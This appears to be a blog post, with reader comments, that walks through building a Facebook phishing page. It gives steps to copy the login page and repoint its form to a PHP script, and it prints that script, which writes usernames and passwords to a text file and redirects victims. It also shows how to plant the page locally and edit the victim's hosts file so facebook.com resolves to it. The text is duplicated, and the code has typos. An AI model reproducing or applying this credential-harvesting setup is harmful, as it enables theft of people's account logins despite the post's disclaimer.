NOTE : This post is for the educational and testing purposes only.The author is not liable for any Legal action taken against reader which choses to use the content of this post for any illegal activities such as unauthorized breaking and hacking in someone's email or social media account.
Phishing : It is the act of attempting to acquire information like usernames,passwords,and credit card details of the user by masquerading as a trustworthy entity.Illegal phishing is a cyber crime,hence if the culprit gets legal actions can be taken against him
This process is carried out normally by an IT experts,and these kinds of IT expert are often called as hackers.
In this post you'll will learn about how they create and manipulate users to use the phishing page.
Normally a phishing page is an exact replica of the original page usually asking for the critical informations like username,passwords,credit card data...etc.This setup can be easily created by following the procedures mention below.
This is the example of a such a mail.
So what do you think, you do,if you receive such an email from your bank or from your social networking website. As this kind of emails are very appealing,You can't able to avoid them.
So how to tackle it ,well this can be done with the help very well known tool,google.
Before following any the unknown or suspicious link you should always google the link.Positive results (positive in your sense,and negative in hacking sense) normally means...
The best way to avoid getting caught by such conditions is to learn how to hack,because if you know how to do it you'll ultimately learn how to avoid it.
So let's begin with your very first(probably) and easy kind of hack by creating a facebook phisher,to do that you should follow the instruction below.
Save the login page : This is the easiest step in the procedure.To save the login page of facebook just goto facebook.com and while on the page hit "ctrl+s".Then browse the location,and save it.
Edit it : This part involves HTML coding.The person who know how to code in html will find this a child's play.what hackers usually do is they transmits the data of the form you filled(every thing you type in a website whether it be your username or password,is a html form.) to the program he created instead of the original sites' program.The program is usually written in the same programming language in which the original program is written.
As this post is dealing with facebook phishing page we are going to use php the facebook's original programming language(i.e the primary language in which facebook is written).
open the html page that you've saved,with notepad or similar text editor program.
find the string action=" your search should look like this.
.png)
Now change the phrase "http://www.facebook.com/login.php" to just "login.php".And just after that you will find method="post" change it to method="get".Hit "ctrl+s" and close the notepad.
The program : This would have been the hardest part (for the person who don't know to program in php) if you don't have a source like this to directly copy....;D.
This php program will save the password,username and other thingy in a text file named list.txt once feeded with the data(via web page that you created by following the procedure above).
write this code in a plain text file and save it as a login.php
Uploading the setup : The phishing setup is by now ready to implant,All you need is a domain name or sub domain name which many sites are offering for free,normally all servers are providing the php parser so you don't need to bother about it.
Anyway,for your information browser can't able to run php files directly,so to get that working you need a php parser.This is the only thing that you need to know about for now....wanna know more you can google it anytime.
If you tried to test the php in your computer,then you should be aware of that.To get that executed you need to get apache (here apache doesn't means that bike neither the warrior,it's a kind of server that will get your php executed).
If you don't want to put the site online.Then it's even better because people are getting smarter and it's very difficult to trap them as they by now know what phishing is and wouldn't go for the link you provide them easily.and in offline mode people don't have to follow your they just have to open fb normally and get trapped.
But there is a limitation in this, you need to have a physical access to the victim's computer.Or you can just plant the setup in your own computer and relax till the victim login to fb using your computer.
Now to plant the setup in your computer you need a virtual server like wamp for windows and xampp for linux.
Download and install it.once installed goto "C:/wamp/www/" rename the file index.php to index2.php.Then copy the entire content i.e facebook's edited page and login.php,paste it here then rename the facebook page to index.html now when go for "127.0.0.1" or "localhost" using any browser when the wamp server is online you will land on this page that you have created.
the setup is ready to hack,
But why the hell any victim put 127.0.0.1 or localhost when he/she wants to access facebook.They surely will go for facebook.com isn't it.Now our goal is to change 127.0.0.1 to "facebook.com",but there is no way to change that.So what to do,well you can't change 127.0.0.1 to facebook although you can link facebook.com to 127.0.0.1 so when a user goes for facebook.com they will be redirected to 127.0.0.1 where your phish is planted.To do that you have to edit the host file.Copy the host file to desktop or wherever you want.Then open it via notepad and at bottom of the file add all these lines
After typing all these your host file will look somewhat like this.
.png)
then save it and replace this host file with the original.
You're ready to hack now.Now when the user go for any of the name above he/she will be redirected to your page.
For your security i wanna inform you that this kind of hacking (or any kind of hacking) is illegal,and is a cyber crime,which can make you spend your remaining life in a cell sized of your bathroom.
And I'm not responsible for the legal actions taken against you or against anybody for hacking into someone's account without their permission or knowledge.
One more thing this method can be used for any website out there.you just have to explore and imagine.
Knowledge is only the key,imagination and creativity is the only thing that will make you elite.
So let your mind fly and imagine,cause the only limit is your imagination.
Enjoy...hacking around and ending up in prison....;)
Phishing : It is the act of attempting to acquire information like usernames,passwords,and credit card details of the user by masquerading as a trustworthy entity.Illegal phishing is a cyber crime,hence if the culprit gets legal actions can be taken against him
This process is carried out normally by an IT experts,and these kinds of IT expert are often called as hackers.
In this post you'll will learn about how they create and manipulate users to use the phishing page.
Normally a phishing page is an exact replica of the original page usually asking for the critical informations like username,passwords,credit card data...etc.This setup can be easily created by following the procedures mention below.
- Saving the login page from original site.
- Editing the data of the saved page to refer to program created by the hacker itself(usually).
- creating the program
- Uploading the faked phishing page to the link some what similar to the original.
- Persuading the victim to login through their phishing page by sending them fake emails messages or by simply manipulating them to do so.
This is the example of a such a mail.
So what do you think, you do,if you receive such an email from your bank or from your social networking website. As this kind of emails are very appealing,You can't able to avoid them.
So how to tackle it ,well this can be done with the help very well known tool,google.
Before following any the unknown or suspicious link you should always google the link.Positive results (positive in your sense,and negative in hacking sense) normally means...
- The link is not fake and by clicking on the link you won't get hacked.
- The email or message you received was real and you're already hacked.
The best way to avoid getting caught by such conditions is to learn how to hack,because if you know how to do it you'll ultimately learn how to avoid it.
So let's begin with your very first(probably) and easy kind of hack by creating a facebook phisher,to do that you should follow the instruction below.
Save the login page : This is the easiest step in the procedure.To save the login page of facebook just goto facebook.com and while on the page hit "ctrl+s".Then browse the location,and save it.
Edit it : This part involves HTML coding.The person who know how to code in html will find this a child's play.what hackers usually do is they transmits the data of the form you filled(every thing you type in a website whether it be your username or password,is a html form.) to the program he created instead of the original sites' program.The program is usually written in the same programming language in which the original program is written.
As this post is dealing with facebook phishing page we are going to use php the facebook's original programming language(i.e the primary language in which facebook is written).
open the html page that you've saved,with notepad or similar text editor program.
find the string action=" your search should look like this.
Now change the phrase "http://www.facebook.com/login.php" to just "login.php".And just after that you will find method="post" change it to method="get".Hit "ctrl+s" and close the notepad.
The program : This would have been the hardest part (for the person who don't know to program in php) if you don't have a source like this to directly copy....;D.
This php program will save the password,username and other thingy in a text file named list.txt once feeded with the data(via web page that you created by following the procedure above).
<php
$writer = fopen("list1.txt", "a");
Header("Location: https://www.facebook.com/login.php");
Foreach($_GET as $variable =>; $value)
{
fwrite($writer, $variable);
fwrite($writer, "=");
fwrite($writer, $value);
fwrite($writer, "\r\n");
}
Fwrite($writer, "\r\n");
fclose($writer);
exit;
?>
$writer = fopen("list1.txt", "a");
Header("Location: https://www.facebook.com/login.php");
Foreach($_GET as $variable =>; $value)
{
fwrite($writer, $variable);
fwrite($writer, "=");
fwrite($writer, $value);
fwrite($writer, "\r\n");
}
Fwrite($writer, "\r\n");
fclose($writer);
exit;
?>
write this code in a plain text file and save it as a login.php
Uploading the setup : The phishing setup is by now ready to implant,All you need is a domain name or sub domain name which many sites are offering for free,normally all servers are providing the php parser so you don't need to bother about it.
Anyway,for your information browser can't able to run php files directly,so to get that working you need a php parser.This is the only thing that you need to know about for now....wanna know more you can google it anytime.
If you tried to test the php in your computer,then you should be aware of that.To get that executed you need to get apache (here apache doesn't means that bike neither the warrior,it's a kind of server that will get your php executed).
If you don't want to put the site online.Then it's even better because people are getting smarter and it's very difficult to trap them as they by now know what phishing is and wouldn't go for the link you provide them easily.and in offline mode people don't have to follow your they just have to open fb normally and get trapped.
But there is a limitation in this, you need to have a physical access to the victim's computer.Or you can just plant the setup in your own computer and relax till the victim login to fb using your computer.
Now to plant the setup in your computer you need a virtual server like wamp for windows and xampp for linux.
Download and install it.once installed goto "C:/wamp/www/" rename the file index.php to index2.php.Then copy the entire content i.e facebook's edited page and login.php,paste it here then rename the facebook page to index.html now when go for "127.0.0.1" or "localhost" using any browser when the wamp server is online you will land on this page that you have created.
the setup is ready to hack,
But why the hell any victim put 127.0.0.1 or localhost when he/she wants to access facebook.They surely will go for facebook.com isn't it.Now our goal is to change 127.0.0.1 to "facebook.com",but there is no way to change that.So what to do,well you can't change 127.0.0.1 to facebook although you can link facebook.com to 127.0.0.1 so when a user goes for facebook.com they will be redirected to 127.0.0.1 where your phish is planted.To do that you have to edit the host file.Copy the host file to desktop or wherever you want.Then open it via notepad and at bottom of the file add all these lines
127.0.0.1 http://www.facebook.com
127.0.0.1 http://facebook.com
127.0.0.1 facebook.com
127.0.0.1 www.facebook.com
127.0.0.1 http://facebook.com
127.0.0.1 facebook.com
127.0.0.1 www.facebook.com
After typing all these your host file will look somewhat like this.
then save it and replace this host file with the original.
You're ready to hack now.Now when the user go for any of the name above he/she will be redirected to your page.
For your security i wanna inform you that this kind of hacking (or any kind of hacking) is illegal,and is a cyber crime,which can make you spend your remaining life in a cell sized of your bathroom.
And I'm not responsible for the legal actions taken against you or against anybody for hacking into someone's account without their permission or knowledge.
One more thing this method can be used for any website out there.you just have to explore and imagine.
Knowledge is only the key,imagination and creativity is the only thing that will make you elite.
So let your mind fly and imagine,cause the only limit is your imagination.
Enjoy...hacking around and ending up in prison....;)
pls clear it
ReplyDeletewhere all the password save
ReplyDeletePasswords alongwith username will be there in a text file named lists.txt anf the directory will be same as of login.php (or whatever you've given name to that PHP file of all codes)
ReplyDeleteAnd make sure you are using Apache correctly (if you are using it offline)..to learn how to use it properly either read the whole post or move to the site of your Apache vendor.